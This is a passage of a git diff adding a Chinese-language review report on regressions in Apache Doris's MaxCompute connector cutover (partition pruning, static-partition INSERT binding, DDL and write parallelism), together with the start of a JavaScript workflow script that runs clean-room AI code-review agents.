INTO mc_part_tbl PARTITION(pt='x') SELECT <非分区列>` 时 `bindColumns` 含 `pt` 而 `child.getOutput()` 不含 → `:941` 列数校验抛 `"insert into cols should be corresponding to the query output"`。legacy `bindMaxComputeTableSink`(`:875-879`)显式过滤静态分区列。`bindConnectorTableSink` 是从 `bindJdbcTableSink` 克隆(JDBC 无静态分区),注释 `"Currently only JDBC catalogs use connector sink"`(`:947`)翻闸后未更新。 +- **处置**:`bindConnectorTableSink` 在 colNames 为空分支剔除 `getStaticPartitionKeyValues().keySet()`,并对 `InsertUtils.java:377-389` 的 VALUES 路径加 `UnboundConnectorTableSink` 分支。Rule-9 UT:`PARTITION(p='x') SELECT 非分区列`(无列名)binds 不抛。**与 DG-2 同一根因**——Phase C 因两个审阅者查到的历史 artifact 不同而分别归类(F48 未查到 DECISION-3 承诺→new-gap;F19 查到→disagreement)。 + +### NG-4 |🟠 major |所有 MaxCompute 写从并行 writer 退化为单 GATHER writer +- **findings**:F18(write),并入 F43(fallback) +- **位置**:`PhysicalConnectorTableSink.java:114-121`;能力源 `Connector.java:54-55`(`MaxComputeDorisConnector` 无 `getCapabilities` override → 空集) +- **cutover↔legacy**:legacy 非分区/全静态分区写 = `SINK_RANDOM_PARTITIONED`(多并行 writer);cutover = GATHER(单 writer 处理所有行)= 每个 MC 写的吞吐回归。 +- **处置**:与 NG-2 同源、同一修复入口。最小修是声明 `SUPPORTS_PARALLEL_WRITE`,但**必须同时**带上 NG-2 的动态分区 hash+local-sort(否则动态分区反而被并行化且无序,回归更重)。或显式接受 GATHER 并登记 deviation。 + +### NG-5 |🟠 major |limit-split 优化忽略 session 变量、默认即触发 +- **finding**:F11(read) +- **位置**:`MaxComputeScanPlanProvider.java:187-196` +- **根因**:`useLimitOpt = limit>0 && (onlyPartitionEquality || !filter.isPresent())`,**从不读** `enable_mc_limit_split_optimization`(`SessionVariable.java:2908`,默认 **false**)。于是无 WHERE 的 `SELECT ... LIMIT n` **默认**就被压成单个 n 行 offset split。 +- **cutover↔legacy**:legacy(`MaxComputeScanNode.java:735-737`)三重闸:`enableMcLimitSplitOptimization`(默认 off) **且** 分区等值谓词 **且** hasLimit——**默认不开**。cutover 默认开、且丢了 session-var 闸。语义反转。 +- **处置**:要么把 `enable_mc_limit_split_optimization` 透传到 `ConnectorSession` 并实现真正的 `checkOnlyPartitionEquality`(恢复三重闸、默认 OFF);要么明确接受"默认优化无过滤 LIMIT"并写 deviation + release-note 能力收敛说明。**不可继续留在"待定"**。 + +### NG-6 |🟡 minor |所有列 isKey=false(DESCRIBE / information_schema 显示 Key=NO,legacy 为 YES) +- **findings**:F3、F10(read,双 lens 命中) +- **位置**:`MaxComputeConnectorMetadata.java:138-143,150-155`(5 参 `ConnectorColumn` ctor → isKey=false);`ConnectorColumnConverter.java:65-70` 透传 `cc.isKey()` +- **cutover↔legacy**:legacy `MaxComputeExternalTable.initSchema`(`:177,189`)每列 isKey=**true**;cutover 全 false。仅元数据展示,不影响读正确性。 +- **处置**:低风险首选 FIX——data+partition 两个列循环改用 6 参 `new ConnectorColumn(..., true)`(converter 已透传 isKey,2 处调用、无 SPI 变更)。或接受并登记 DV + release-note,并加 DESCRIBE/information_schema Key 列回归断言。 + +### NG-7 |🟡 minor |丢失 batch-mode(异步、按分区分批)split 生成 +- **findings**:F6、F13(read,双 lens) +- **位置**:`PluginDrivenScanNode.java`(无 `isBatchMode/numApproximateSplits/startSplit` override,继承 `SplitGenerator` 默认);legacy `MaxComputeScanNode.java:214-298` +- **cutover↔legacy**:legacy 对多分区表分批异步建 read session、流式喂 split;cutover 单 session 跨全分区、一次性同步枚举所有 split → 大分区表规划慢、session+split 内存大(潜在 OOM)。**与 DG-1(裁剪未透传)耦合**:只有裁剪喂进真实 selected-partition 集后 batch-by-spec 才有意义。 +- **处置**:通用插件层缺口(每个 full-adopter 都继承非 batch 默认)。短期登记 DV + 大分区压测;长期给 SPI 加 batch 路径。 + +### NG-8 |🟡 minor(regression=no)|post-commit cache-refresh 失败被吞(INSERT 报成功) +- **finding**:F15(write) +- **位置**:`PluginDrivenInsertExecutor.java:178`(override `doAfterCommit()` 用 try/catch 包 `super.doAfterCommit()` = `handleRefreshTable`,仅 log warning 后正常返回) +- **cutover↔legacy**:legacy `MCInsertExecutor` 不 override → refresh 异常传播 → INSERT 报 FAILED;cutover 吞掉 → INSERT 报 OK(cache 暂 stale)。**cutover 行为反而更安全**(数据已提交 ODPS,报失败会诱发重试/重复写),但是**可观察的行为变更**且无书面登记。 +- **处置**:无需改码,但补登记 DV + release-note(行为收敛),并在 `:164-176` Javadoc 注明该理由也覆盖 connector-transaction(MC) 路径,不只 JDBC_WRITE。 + +--- + +## B. ⚖️ 与历史结论的分歧(disagreements)—— 代码与 plan-doc 的"已修/正确/可接受"声明相矛盾 + +> 6 个独立问题(原始 8 条,含 F1=F7、F22=F27 重复)。**这一节最关键**:每条都是"历史说已解决,代码说没有"。 + +### DG-1 |🟠 major |分区裁剪从未推到 ODPS read session(`requiredPartitions=emptyList`) +- **findings**:F1、F7(read,双 lens 各自独立锁定) +- **位置**:`MaxComputeScanPlanProvider.java:198-202,320`(`createReadSession(..., Collections.emptyList())`);`PhysicalPlanTranslator.java:753-758`(路由到 `PluginDrivenScanNode.create()` 时**从不**调 `setSelectedPartitions`,对比 legacy 分支 `:797` 传 `fileScan.getSelectedPartitions()`) +- **代码事实**:FIX-PART-GATES **确实**加了 `PluginDrivenExternalTable` 的 `supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems`(`:163-226`),Nereids `PruneFileScanPartition` **能**算出 SelectedPartitions——**但该结果在 translator 被丢弃**,`PluginDrivenScanNode`/`MaxComputeScanPlanProvider` 根本没有承接 selected-partition 的字段/参数,`planScan` 无条件传空 `requiredPartitions`。返回行因 conjunct 在 BE 重算而正确,但 **ODPS storage session 建在全分区上**。 +- **历史分歧**:`P4-cutover-review-findings.md` 原本把这条记为 **READ-P3 (major) + READ-C2 (blocker)**,修复建议**两半**:①override 分区元数据 API ②`create() 透传 selectedPartitions → planScan 接 requiredPartitions(prunedSpecs)`。**FIX-PART-GATES 只落了①**——其 design 自述 `scope = fe-core only / 不涉及 fe-connector`(`:104`),却以 READ-P3 为"所解决问题",review-rounds 宣称 `production 正确 / pruning 不变式 clean`。**②从未实现,裁剪不端到端生效,D-028"分区裁剪恢复"叙事被代码证伪。** +- **处置**:**大声 surface**。①给 `PluginDrivenScanNode` 加 SelectedPartitions 字段/setter,`PhysicalPlanTranslator:756-758` 照 legacy 调 `setSelectedPartitions`;②扩 SPI `planScan` 签名把裁剪分区集穿到 `MaxComputeScanPlanProvider`,从 `Collections.emptyList()` 改为按 prunedSpecs 建 `requiredPartitions`,补 legacy 空选短路(`MaxComputeScanNode:724-727`)。若改为接受,则**必须**改写 FIX-PART-GATES design/review-rounds 与 decisions-log,明确"只恢复了元数据可见性,read-session requiredPartitions 下推仍为已知降级"并入 deviations-log。**无论哪条,`production CLEAN / pruning 不变式 clean` 的裁决必须更正。** + +### DG-2 |🔴 blocker |静态分区无列名 INSERT 在 bind 失败(DECISION-3 承诺未兑现) +- **finding**:F19(write);**与 NG-3/F48 同根因** +- **位置**:`BindSink.java:917-943`、`InsertUtils.java:377-389` +- **历史分歧**:`P4-T05-T06-cutover-design.md §4.2`(G4/G5)称静态分区 cutover 是"legacy MC 路径的忠实泛型镜像",**DECISION-3**(§5/风险表 `:168`)明确承诺静态分区+overwrite 绑定落地以"避免翻闸时 INSERT-OVERWRITE-PARTITION 回归"。但 G4/G5 只把 spec 带进 `UnboundConnectorTableSink` 和 `PluginDrivenInsertCommandContext.staticPartitionSpec`(给 BE write-plan),**bind 期列数剔除从未镜像**——DECISION-3 声称要防的那个回归恰恰是 live 的。全 plan-doc grep `bindConnectorTableSink` / `insert into cols should be corresponding` 零命中 = 未登记。 +- **处置**:同 NG-3 修复。并更正 `P4-T05-T06-cutover-design.md` G4/G5/DECISION-3:「忠实镜像」不完整,漏了 bind 期静态分区列剔除。 + +### DG-3 |🟠 major |DROP DATABASE FORCE 不再级联删表 +- **findings**:F22、F27(ddl,双 lens) +- **位置**:`PluginDrivenExternalCatalog.java:337-355`(`force` 形参拿到后从不使用,注释自述"级联交给连接器");连接器 `dropDatabase`(`:408-413`)→`schemas().delete()` 无表清理 +- **cutover↔legacy**:legacy `MaxComputeMetadataOps.dropDbImpl:142-155` 在 `force=true` 时显式枚举远端表逐个 `dropTableImpl` 后才删 schema(该循环的存在本身证明 ODPS `schemas().delete()` 不自级联);cutover 在非空 schema 上 DROP DB FORCE 退化成非 FORCE 行为(很可能直接失败/留残表)。 +- **历史分歧(自相矛盾)**:T06c design(`:57,111,185`)把它框为"可接受已知边界 / 记 OQ / 不复刻级联";但**后续对抗 review 明确推翻**——`P4-cutover-review-findings.md` DDL-P2(`:206`)/DDL-C3(`:211`) 均"✅存活 3✓/0✗ major",`:225,232` 显式标"disagreement,不认同其'可接受'定级"。**争议从未在代码或账本解决**,仍停在 cutover-fix-design §5 `:496`"本批次外…待用户定(question)"。 +- **处置**:**别把 T06c §5"记 OQ/可接受"当作已解决**。先用真实 ODPS 验 `schemas().delete` 对非空库行为;若拒删则必须补级联(`force==true` 时枚举 dropTable,或扩 SPI `dropDatabase` 带 force/cascade)。若决定不支持,**至少 fail-loud**(`force==true`+非空库抛明确错)并登记 deviation——当前静默丢 force 违反 Rule 12。 + +### DG-4 |🟠 major |CREATE DATABASE IF NOT EXISTS 丢远端存在性预检(`ifNotExists` 在到连接器前被硬编码成 false) +- **finding**:F26(ddl);**注**:同一问题的 F23 被另一审阅者归为 known-degradation——分类分歧见 §D 备注 +- **位置**:`PluginDrivenExternalCatalog.java:312-326`(只按 `getDbNullable` FE-cache 短路);`MaxComputeConnectorMetadata.java:404`(硬编码 `structureHelper.createDb(odps, dbName, false)`,丢用户 `ifNotExists`) +- **cutover↔legacy**:legacy `createDbImpl:110-124` 同时查 FE-cache **和**远端 `databaseExist`,已存在+ifNotExists 时干净 no-op;cutover 对"远端已存在但 FE-cache 没有"的库执行 `CREATE DATABASE IF NOT EXISTS` 会命中 `schemas().create()` 抛 "already exists"。 +- **历史分歧**:`P4-cutover-review-findings.md` DDL-C4(`:216` major,"✗否决→修")+DDL-P5(`:217` minor,"→修")已记此缺陷并开修复处方;但 P4-T06d 只排了 6 个 fix(DDL 的是 ENGINE 与 REMOTE),`cutover-fix-design.md:239` 明确"createDb/dropDb 不在本 issue 范围",**DDL-C4 无对应 fix commit**;task-list `:12` 却称"✅全部完成(6/6)",deviations/decisions-log 均无登记。 +- **处置**:重开 DDL-C4。`createDb()` 在 `ifNotExists && getDbNullable==null` 时先做远端存在检查(`connector...databaseExists` 已暴露,无需改 SPI 签名、对 full-adopter 泛型);补 UT(stub `databaseExists=true` → 不调 `createDatabase`、不写 editlog)。或显式登记 deviation——别留"孤儿修 verdict"。 + +### DG-5 |🟡 minor |CREATE TABLE 不再拒绝 AUTO_INCREMENT 列 +- **finding**:F24(ddl) +- **位置**:`MaxComputeConnectorMetadata.java:417-431`(`validateColumns` 只查空/重/类型);`CreateTableInfoToConnectorRequestConverter.java:90-92`(丢 auto-inc flag);`ConnectorColumn` 结构上无 auto-inc 字段 +- **cutover↔legacy**:legacy `MaxComputeMetadataOps.validateColumns:422-425` 显式抛 "Auto-increment columns are not supported for MaxCompute tables";cutover 静默建表(auto-inc 被悄悄丢弃)。 +- **历史分歧**:`P4-maxcompute-migration.md:117`(P4-T01) 称此丢弃是**有意接受**——理由"nereids 上游已拒",但该前提**对 auto-inc 为假**(`ColumnDefinition.validate` 以 `isOlap=false` 调用、无 auto-inc 拒绝)。后续 DDL-P4(major,存活 3/3) 已抓到并要求"先确认 nereids 是否已拦"(从未验),停在"待用户定"。**两份历史 artifact 互相矛盾。** +- **处置**:surface 分歧,用户定夺:(a) 视为 parity 要求→给 `ConnectorColumn` 加 `isAutoInc` 字段透传并在 `validateColumns` 重新校验;或 (b) 明确接受并在 deviations-log 登记(理由如"ODPS 本就忽略/拒绝 auto-inc"),并更正 `P4-maxcompute-migration.md:117` 的假声明。聚合列那半已被非-OLAP key 列路径覆盖,无需单独修。 + +### DG-6 |🟠 major(建议从 minor 上调)|createTable 恒返回 false → CTAS IF-NOT-EXISTS 误写已存在表 +- **finding**:F33(replay 域) +- **位置**:`PluginDrivenExternalCatalog.java:264-300`(`:290` 无条件写 `OP_CREATE_TABLE`,`:299` 恒 `return false`,即便连接器在 IF NOT EXISTS 下 no-op 了已存在表 `MaxComputeConnectorMetadata.java:330-338`) +- **cutover↔legacy**:`Env.createTable` 契约(`:3746-3747`)要求表已存在时返回 true;legacy `createTableImpl:179-197` 在 existing+IF-NOT-EXISTS 返回 true,`ExternalCatalog.createTable:1063-1075` 仅 `!res` 时写 editlog。cutover 恒 false → **CTAS 链 `CreateTableCommand.java:103` `if(createTable(...)) return;` 不短路** → `CREATE TABLE IF NOT EXISTS ... AS SELECT` 对已存在表**执行 INSERT 而非跳过**。 +- **历史分歧**:此处曾被 review 为 **DDL-C5**(`:213`),但**定级 minor**、处置"待定/可接受/当前不阻塞",且**分析只覆盖 editlog 冗余**(单 FE 上无害),**CTAS 数据写入后果完全缺席**。FIX-DDL-ENGINE 重新打开 CTAS 路径(design `:215` 自承认"CTAS 同样修好")反而把这条 return-false 暴露成真实的数据变更缺陷——而历史把它评为 minor/可接受。 +- **处置**:surface 并把 DDL-C5 **从 minor 上调 major**。修:`createTable` 区分"新建 vs 已存在"——IF-NOT-EXISTS 命中时 FE 侧查 `getTableNullable`/远端存在,返回 true + 跳 editlog + 跳 `resetMetaCacheNames`(镜像 legacy)。Rule-9 测试:CTAS-IF-NOT-EXISTS 对已存在表**不**INSERT + editlog 未写。若延期,必须在 deviations-log 登记为"已知数据变更回归"(不只 editlog 备注)。 + +--- + +## C. 各域独立 parity 判定(每域一句,来自 12 份 parityAssessment 的综合) + +| 域 | 独立判定 | 是否达成 legacy parity | +|---|---|---| +| **1 读取** | 返回行**结果正确**(descriptor=`MAX_COMPUTE_TABLE`+TMCTable 与 legacy 逐字一致、BE static_cast/JNI 一致、split offset/`-1` sentinel 一致、谓词类型/时区转换镜像 legacy、conjunct 始终留给 BE 重算);但**分区裁剪未端到端生效**(DG-1)、limit-split 默认反转(NG-5)、isKey=false(NG-6)、单子表达式失败致整 filter NO_PREDICATE(F8 已登记)、CAST 下推丢行(F9 ⚠️复查证为**未登记回归**、已修 `cc32521ed99`/[D-036])、无 batch-mode(NG-7)。 | ❌ **分区扫描效率 + 元数据保真未达**;行正确性达成。主要是**设计/wiring 缺口**(SPI scan node 无通道传 selected-partition/limit 上下文)。 | +| **2 写入** | 事务生命周期(begin/finalizeSink/doBeforeCommit 抓 `loadedRows=getUpdateCnt()`/commit/rollback)、affected-rows 来源、提交协议(TBinaryProtocol/TMCCommitData)、write-session 参数、BE writer+block-id RPC **均与 legacy 等价(BE 零 diff)**;但 planner 侧**写分发**(GATHER vs hash+local-sort/并行,NG-2/NG-4)与**静态分区 bind**(NG-3/DG-2)回归,block-count 上限硬编码 20000(F14/F20 已登记),post-commit refresh 吞异常(NG-8)。 | ❌ **写分发 + 静态分区未达**(含 blocker);事务/数据面达成。 | +| **3 DDL** | 常规良构 case 达 parity(engine padding/一致性、local→remote 名解析、类型拒绝集、lifecycle/bucket/property、identity-only 分区、editlog 用 local 名);jdbc/es/trino 共享路径未受波及。但 **DB 级 DDL** 与一项列校验回归:DROP DB FORCE 不级联(DG-3)、CREATE DB IF NOT EXISTS 丢远端预检(DG-4)、auto-inc 拒绝丢失(DG-5)、CTAS IF-NOT-EXISTS 误写(DG-6)。 | ⚠️ 常规 case 达成;**DB-DDL/CTAS 边界未达**。是**实现缺口**非设计缺口(SPI 形状能承载,代码没做)。 | +| **4 元数据回放** | editlog/image 序列化、replay 重建 cache、follower、GSON 三注册(catalog/db/table)compat、replay key 用 local 名——**parity,无回归**。(注:`createTable` 返回值/CTAS 语义缺陷 DG-6 挂在本域,但属 DDL 语义而非 replay 机制问题。) | ✅ 回放机制达成 parity。 | +| **5 元数据 cache** | schema cache 走 `default` engine(TTL/eviction 与 legacy `maxcompute` 条目**完全一致**);`(PluginDrivenSchemaCacheValue)` 下转型**类型安全**(唯一生产者 `initSchema` 只产该类型,绝不会缓存裸 `SchemaCacheValue`);cache key(NameMapping)一致;列名映射 identity。**有意分歧**:legacy 二级 partition-VALUE cache 被去除→每查询直连 ODPS 列分区(更新鲜、多一次往返、无正确性损失,F35 已登记);row-count/stats 从 legacy 的 -1 变为真取(增强非回归)。 | ✅ schema cache 达 parity;partition-value 缓存是**有意设计变更**非交付缺口。 | +| **6 旧逻辑残留/fallback** | dispatch 面**基本干净**:legacy `instanceof MaxCompute*` / `MAX_COMPUTE` type-switch 分支翻闸后**死而存**(compat 残留,非活 fallback),PluginDriven 并行分支在 read scan/BindRelation/SHOW PARTITIONS/partitions TVF/CreateTableInfo/Alter/UnboundTableSinkCreator/BindSink/GsonUtils 三注册/CatalogFactory **均已接且先于 legacy 匹配**;`buildTableDescriptor` 无 SCHEMA_TABLE 兜底。**但写路径未达 parity**——本 lens 独立复现了 NG-1(INSERT OVERWRITE 挡死) + NG-2/NG-4(写分发 GATHER) + NG-3(静态分区 bind),正是 domain-6"半接 dispatch"问题。 | ⚠️ 元数据/DDL/读 dispatch 达成;**写路径 dispatch 半接(blocker)**。 | + +--- + +## D. 全部存活 findings(33)一览 + +> `status`:new-gap=开发遗漏未登记 | disagreement=与历史"已修/可接受"矛盾 | known-degradation=已登记的已知降级(仍为真,但有账可查)。`confirms` = 3 票中确认票数。 + +| id | 域 | sev | category | status | 标题(简) | confirms | +|---|---|---|---|---|---|---| +| F1 | read | major | regression | **disagreement** | 裁剪未推到 ODPS read session(=F7) | 3 | +| F7 | read | major | regression | **disagreement** | 同 F1(另一 lens) | 3 | +| F2 | read | minor | regression | known-degr | limit-split opt 永久禁用(`checkOnlyPartitionEquality` 恒 false) | 2 | +| F8 | read | major | regression | known-degr | 单子表达式不可转→整 filter NO_PREDICATE | 3 | +| F9 | read | major | **correctness** | ~~known-degr~~→**regression** ⚠️ | **CAST 谓词被剥壳下推 ODPS→丢行**(⚠️2026-06-08 复查 `wzoa6dkvw` 0/3 refuted 推翻「known-degr/已登记」定级:实为**未登记静默丢行回归**,legacy 丢弃 CAST 谓词故正确、cutover 推下剥壳谓词更紧。已 **Fix** `cc32521ed99` [D-036]/[DV-020]) | 3 | +| F3/F10 | read | minor | parity | **new-gap** | 所有列 isKey=false | 3/3 | +| F6/F13 | read | minor | regression/d-i-gap | **new-gap** | 丢失 batch-mode 异步 split | 3/3 | +| F11 | read | major | regression | **new-gap** | limit-split 忽略 session-var、默认触发 | 3 | +| F12 | read | minor | design-impl-gap | known-degr | `checkOnlyPartitionEquality` stub 恒 false | 2 | +| F14/F20 | write | major/minor | parity/regression | known-degr | block-id 上限硬编码 20000(非 Config) | 3/3 | +| F15 | write | minor | fallback | **new-gap** | post-commit refresh 吞异常(report OK) | 3 | +| F21 | write | minor | regression | known-degr | 同 F15(refresh 吞异常,另一 lens) | 3 | +| F17 | write | **blocker** | regression | **new-gap** | 动态分区 INSERT 丢 local-sort | 3 | +| F18 | write | major | regression | **new-gap** | 写退化为单 GATHER writer | 3 | +| F19 | write | **blocker** | regression | **disagreement** | 静态分区无列名 INSERT bind 失败 | 3 | +| F22/F27 | ddl | major | regression | **disagreement** | DROP DB FORCE 不级联 | 3/3 | +| F23 | ddl | major | regression | known-degr | CREATE DB IF NOT EXISTS 丢远端预检(≈F26,分类分歧) | 3 | +| F26 | ddl | major | regression | **disagreement** | 同上,归为分歧(评 "6/6完成/修" 矛盾) | 3 | +| F24 | ddl | minor | regression | **disagreement** | 不再拒 AUTO_INCREMENT | 3 | +| F25/F28 | ddl | nit/minor | regression/replay | known-degr | IF NOT EXISTS 已存在表仍写 editlog | 3/3 | +| F31 | ddl | minor | parity | known-degr | 丢防御性 auto-inc/agg 列拒绝 | 3 | +| F33 | replay | major | regression | **disagreement** | createTable 恒 false→CTAS 误写已存在表 | 3 | +| F34 | replay | minor | design-impl-gap | known-degr | createDb IF-NOT-EXISTS 仅查 FE-cache + dropDb 丢 force | 2 | +| F35 | cache | minor | cache | known-degr | 去 legacy 二级 partition-value cache(每查询直连) | 3 | +| F42/F47 | fallback | blocker/major | regression | **new-gap** | INSERT OVERWRITE 被网关挡死 | 3/3 | +| F43 | fallback | major | regression | **new-gap** | 写分发 fallback 到 GATHER(综合 F17+F18) | 3 | +| F48 | fallback | major | design-impl-gap | **new-gap** | 静态分区 INSERT bind 忽略静态分区列(=F19 根因) | 3 | + +--- + +## E. 元观察 / 注意事项 / 后续 + +1. **分类分歧本身是模糊的**:同一根因被两个审阅者按各自查到的历史 artifact 分别归 new-gap / disagreement / known-degradation(如 CREATE DB 预检 F23 known-degr vs F26 disagreement;静态分区 bind F48 new-gap vs F19 disagreement)。**建议把 newGaps∪disagreements 的并集统一当"必须 triage"处理**,不要被 status 标签的细分误导。 +2. **写路径是这轮的重灾区,且大量被上一轮遗漏/低估**:3 个写 blocker(INSERT OVERWRITE、动态分区 local-sort、静态分区 bind)+ 写并行退化,集中暴露"通用 `PhysicalConnectorTableSink`/`bindConnectorTableSink` 是从 JDBC 语义克隆、未承接 MaxCompute 分区语义"。fallback lens 的"半接 dispatch"问题独立复现了它们——交叉验证有效。 +3. **`FIX-PART-GATES` 的"分区裁剪恢复 / pruning 不变式 clean"是本轮最明确的证伪**(DG-1):只落 FE 元数据半边,裁剪集在 translator 丢弃。建议优先更正该 design/review-rounds/decisions-log 的措辞。 +4. **Batch-D 红线扩充**:删 legacy 前,至少 `PhysicalMaxComputeTableSink`(NG-2/NG-4 唯一逻辑副本)、`MaxComputeExternalTable` allowInsertOverwrite 分支(NG-1)、legacy `bindMaxComputeTableSink` 静态分区过滤(NG-3)必须先在 PluginDriven/connector 路径补齐,否则删除即永久丢失。 +5. **一项数据质量瑕疵**:`write/parity` 的 `parity_assessment` 文本尾部混入了 `` 工具调用残片(某子 agent 输出泄漏),不影响结论实质,已在本报告中清理引用。 +6. **真值闸未变**:写路径 blocker(动态/静态分区、OVERWRITE)的最终确认仍需 **live e2e(真实 ODPS,CI 默认跳)**——本复审是静态代码层面的高置信判定,不替代 e2e。 +7. **建议 triage 顺序**:3 个写 blocker(NG-1/NG-2/NG-3 = DG-2)→ DG-1 裁剪透传 → DG-3/DG-4/DG-6 DB-DDL/CTAS → NG-4/NG-5 写并行+limit 默认 → NG-6~8 与剩余 minor。 + +> **来源**:workflow `w4eua10d5` 结构化输出(`parityAssessments`/`newGaps`/`disagreements`/`confirmed`)。原始 JSON 见 `/tmp/.../tasks/w4eua10d5.output`;脚本 `plan-doc/reviews/maxcompute-full-rereview.workflow.js`。 diff --git a/plan-doc/reviews/maxcompute-full-rereview.workflow.js b/plan-doc/reviews/maxcompute-full-rereview.workflow.js new file mode 100644 index 00000000000000..60422fefaec697 --- /dev/null +++ b/plan-doc/reviews/maxcompute-full-rereview.workflow.js @@ -0,0 +1,272 @@ +// Clean-room adversarial RE-REVIEW of all MaxCompute functional paths (cutover vs legacy). +// +// HOW TO RUN (next session): +// Workflow({ scriptPath: "plan-doc/reviews/maxcompute-full-rereview.workflow.js" }) +// optional tuning: args: { verifyVotes: 3, lensesPerDomain: 2, includeBe: true } +// +// DISCIPLINE (see plan-doc/HANDOFF.md "Clean-room 铁律"): +// - Phase A (Review) + Phase B (Verify) agents are CODE-ONLY. Their prompts contain ONLY source +// pointers (fe/ be/ gensrc/) and "compare cutover vs legacy". They are told NOT to read any +// plan-doc/ design/review/decisions/deviations/HANDOFF/memory — to keep judgment uncontaminated. +// - Phase C (CrossCheck) is the ONLY phase allowed to read the development history (the QUARANTINE), +// and only to classify already-independently-confirmed findings. +// - The P4-T06d fixes themselves are IN SCOPE and judged fresh; "it was fixed / mutation-proven" +// is a prior that never enters Phase A/B. +// +// The script returns structured data; the orchestrator writes +// reviews/P4-maxcompute-full-rereview-.md from it (stamp the date when writing). + +export const meta = { + name: 'maxcompute-full-rereview', + description: 'Clean-room adversarial re-review of MaxCompute read/write/DDL/replay/cache/fallback (cutover vs legacy)', + phases: [ + { title: 'Review', detail: 'per-domain x lens clean-room reviewers (code-only, no plan-doc)' }, + { title: 'Verify', detail: '3 refute-by-default skeptics per finding (code-only)' }, + { title: 'CrossCheck', detail: 'classify survivors vs quarantined history (Phase C only)' }, + ], +} + +const REPO = '/mnt/disk1/yy/git/wt-catalog-spi' +const verifyVotes = (args && args.verifyVotes) || 3 +const lensesPerDomain = (args && args.lensesPerDomain) || 2 // 1 = parity only; 2 = + delivery/fallback +const includeBe = !args || args.includeBe !== false // default: include BE C++ paths + +// ---- shared clean-room contract (NO conclusions, NO plan-doc) ---- +const CLEANROOM = `You are a CLEAN-ROOM code reviewer. Repo root: ${REPO}. +CONTEXT: MaxCompute's functional paths were re-implemented during a connector-SPI "cutover". After the +cutover a max_compute catalog is instantiated as PluginDrivenExternalCatalog and its tables are +TableType.PLUGIN_EXTERNAL_TABLE. The pre-cutover ("legacy") implementation still exists in the tree +(mainly under fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/ and sibling legacy +classes). Your job: judge the CURRENT cutover implementation INDEPENDENTLY and compare it against the +legacy implementation. +STRICT DISCIPLINE: + - Read ONLY source code: fe/, be/, gensrc/. Use git/grep/file reads. + - DO NOT read anything under plan-doc/ (designs, reviews, decisions-log, deviations-log, HANDOFF, + PROGRESS) and DO NOT rely on any remembered project conclusions. Form your opinion from code alone. + - Make NO assumption that anything "was fixed", "is correct", or "was verified". Treat the current + code as unaudited. + - Every finding MUST cite file:line and state the CUTOVER vs LEGACY behavioral difference and whether + it is a regression (yes/no/unsure). "The code intends X" is not evidence — verify X actually holds. + - Report only real, evidence-backed issues OR genuine cutover-vs-legacy divergences. No speculative + style nits. If a path is correct and matches legacy, say so (zero findings is a valid result).` + +// ---- the 6 domains: neutral scope + entry points + open questions (NO verdicts) ---- +const DOMAINS = [ + { + key: 'read', + title: 'Read / SELECT', + scope: `CUTOVER: datasource/PluginDrivenExternalTable (toThrift / initSchema / getFullSchema); +datasource/PluginDrivenScanNode; fe-connector-maxcompute/.../MaxComputeScanPlanProvider, +MaxComputeScanRange, MaxComputeConnectorMetadata (buildTableDescriptor / getTableSchema / split); +be-java-extensions/max-compute-connector/.../MaxComputeJniScanner. +${includeBe ? 'BE: be/src/exec/scan/file_scanner.cpp; be/src/runtime/descriptors.cpp; be/src/format/table/max_compute_jni_reader.cpp; gensrc/thrift/Descriptors.thrift (TMCTable).\n' : ''}LEGACY BASELINE: datasource/maxcompute/MaxComputeExternalTable (toThrift); maxcompute/source/MaxComputeScanNode, MaxComputeSplit.`, + questions: `What table descriptor TYPE and FIELDS does the cutover toThrift produce, and how does BE consume it +(${includeBe ? 'descriptors.cpp factory + file_scanner.cpp cast + max_compute_jni_reader.cpp' : 'BE side'})? Same as legacy? +Split size/offset semantics (byte_size vs row_offset sentinel)? Predicate pushdown incl. CAST / datetime / source +time-zone? Partition pruning (does cutover prune or full-scan)? Column properties (e.g. isKey) as surfaced in +DESCRIBE / information_schema? limit-split optimization trigger conditions vs config default? How do +endpoint/project/quota/credentials reach BE?`, + }, + { + key: 'write', + title: 'Write / INSERT', + scope: `CUTOVER: nereids/.../insert/PluginDrivenInsertExecutor; planner/PluginDrivenTableSink; +transaction/PluginDrivenTransactionManager; fe-connector-maxcompute/.../MaxComputeConnectorTransaction + write-plan/sink. +${includeBe ? 'BE: MaxCompute writer + block-allocation RPC (FrontendServiceImpl.getMaxComputeBlockIdRange, TMaxComputeBlockId*).\n' : ''}LEGACY BASELINE: nereids/.../insert/MCInsertExecutor; transaction/.../MCTransaction; legacy MC sink.`, + questions: `Transaction lifecycle (begin / finalizeSink / beforeExec / commit / abort / rollback) vs legacy — equivalent? +Where do reported affected-rows come from? Is the block-count limit honored (Config.max_compute_write_max_block_count)? +Commit protocol (TBinaryProtocol / TMCCommitData)? How are post-commit cache-refresh failures handled vs legacy? +Parallel vs single-writer distribution?`, + }, + { + key: 'ddl', + title: 'DDL (CREATE/DROP TABLE, CREATE/DROP DB)', + scope: `CUTOVER: datasource/PluginDrivenExternalCatalog (createTable / createDb / dropDb / dropTable); +nereids/.../info/CreateTableInfo (paddingEngineName / checkEngineWithCatalog / analyzeEngine / CTAS path); +connector/ddl/CreateTableInfoToConnectorRequestConverter; fe-connector-maxcompute/.../MaxComputeConnectorMetadata (DDL). +LEGACY BASELINE: datasource/maxcompute/MaxComputeMetadataOps. +NOTE: createTable/dropTable/initSchema on the PluginDriven classes are SHARED by jdbc/es/trino + max_compute.`, + questions: `Local-name -> remote-name resolution for create & drop (with name-mapping on AND off)? Engine inference and +catalog-engine consistency check? Column-constraint / partition-desc / distribution-desc validation vs legacy? +ifExists / ifNotExists semantics? CREATE-time existence precheck? DROP DATABASE FORCE cascade? Edit-log content and +the cache-invalidation it pairs with (local vs remote names)? Any behavior change for the shared jdbc/es/trino path?`, + }, + { + key: 'replay', + title: 'Metadata replay / editlog / image', + scope: `CUTOVER: datasource/ExternalCatalog (replayCreateTable / replayDropTable / replayCreateDb / replayDropDb, +incl. the metadataOps==null branch); persist/CreateTableInfo, DropInfo, CreateDbInfo, DropDbInfo; +PluginDrivenExternalCatalog.gsonPostProcess, PluginDrivenExternalTable.gsonPostProcess; +CatalogFactory / GsonUtils registerCompatibleSubtype; InitCatalogLog.Type. +LEGACY BASELINE: MaxComputeExternalCatalog + MaxComputeMetadataOps.afterCreateDb/afterDropDb/afterCreateTable/afterDropTable; legacy gson registration.`, + questions: `Does the replay path (no metadataOps) correctly rebuild the FE cache? 